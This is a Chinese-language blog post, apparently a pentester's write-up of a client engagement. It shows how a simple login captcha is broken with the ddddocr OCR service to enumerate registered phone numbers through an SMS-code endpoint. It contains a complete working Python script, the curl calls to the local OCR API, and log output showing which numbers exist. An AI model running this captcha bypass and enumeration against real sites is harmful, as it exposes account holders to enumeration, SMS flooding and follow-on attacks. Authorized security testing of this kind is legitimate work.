文章

验证码识别-枚举用户名

发表于 更新于
作者 fb0sh
2 分钟阅读
验证码识别-枚举用户名

最近给客户测试站点时,首页就是一个登录框,验证码也过于简单

使用ddddocr 识别正确率能达到90%

抓取验证码请求包

先用抓包器拦截,然后点验证码刷新

https://szsj.xxxx.xxxx.cn/auth/code?randomStr=0.980556788

得到了这样的url, 其返回内容则是验证码图片

登录请求

https://szsj.xxxx.xxxx.cn/auth/smsCode?username=13022222222&code=mlQt&randomStr=0.980556788

可以推测 randomStr 在phone和code之间 作为映射

验证码识别

https://github.com/sml2h3/ddddocr

最好选用python3.8 可用uv管理

1
2
3
4
5

git clone https://github.com/sml2h3/ddddocr.git
cd ddddocr
python setup.py install

ddddocr api

一定要这样安装

初始化服务

1
2
3

curl -X POST "http://localhost:8000/initialize" \
     -H "Content-Type: application/json" \
     -d '{"ocr": true, "det": false}'

OCR识别(支持颜色过滤)

1
2
3
4
5
6
7
8

curl -X POST "http://localhost:8000/ocr" \
     -H "Content-Type: application/json" \
     -d '{
       "image": "base64_encoded_image_data",
       "color_filter_colors": ["red", "blue"],
       "png_fix": false,
       "probability": false
     }'

目标检测

1
2
3

curl -X POST "http://localhost:8000/detect" \
     -H "Content-Type: application/json" \
     -d '{"image": "base64_encoded_image_data"}'

完整代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

import requests
import random
import base64
import json

with open("./phone.txt", "r") as f:
    with open("./log.txt", "w", buffering=1, encoding="UTF-8") as fw:
        for phone in f.readlines():
            phone = phone.strip()
            randomStr = "{:.16f}".format(random.random())

            url = f"https://szsj.xxxx.xxxx.cn/auth/code?randomStr={randomStr}"
            res = requests.get(url)
            b64_img_code = base64.b64encode(res.content).decode("utf-8")

            url = "http://localhost:8000/ocr"

            payload = {
                "image": b64_img_code,
                "color_filter_colors": [],
                "png_fix": False,
                "probability": False,
            }

            headers = {"Content-Type": "application/json"}

            response = requests.post(url, json=payload, headers=headers)
            print(response.text)
            fw.write(response.text)
            code = json.loads(response.text)["data"]["text"]

            url = f"https://szsj.xxxx.xxxx.cn/auth/smsCode?username={phone}&code={code}&randomStr={randomStr}"
            res = requests.get(url)
            fs = f"{phone}\t{res.text}\n\n"
            fw.write(fs)
            print(fs)

log.txt

可以看到 能够枚举成功

{"success":true,"message":"OCR识别成功","data":{"text":"w11f","probability":null}}15333332682	{"msg":"验证码已发送至手机","code":0}

{"success":true,"message":"OCR识别成功","data":{"text":"pcbt","probability":null}}15744448773	{"msg":"验证码已发送至手机","code":0}

{"success":true,"message":"OCR识别成功","data":{"text":"igha","probability":null}}13000000000	{"msg":"账号或图片验证码不正确","code":500}

{"success":true,"message":"OCR识别成功","data":{"text":"z6my","probability":null}}13011111111	{"msg":"账号信息异常,请联系管理员","code":500}

{"success":true,"message":"OCR识别成功","data":{"text":"r539","probability":null}}13022222222	{"msg":"账号信息异常,请联系管理员","code":500}

{"success":true,"message":"OCR识别成功","data":{"text":"kb1","probability":null}}13033333333	{"msg":"账号或图片验证码不正确","code":500}

{"success":true,"message":"OCR识别成功","data":{"text":"bup3","probability":null}}13044444444	{"msg":"账号信息异常,请联系管理员","code":500}

{"success":true,"message":"OCR识别成功","data":{"text":"Ebpq","probability":null}}13055555555	{"msg":"账号信息异常,请联系管理员","code":500}
WEB
blog ocr
本文由作者按照 CC BY 4.0 进行授权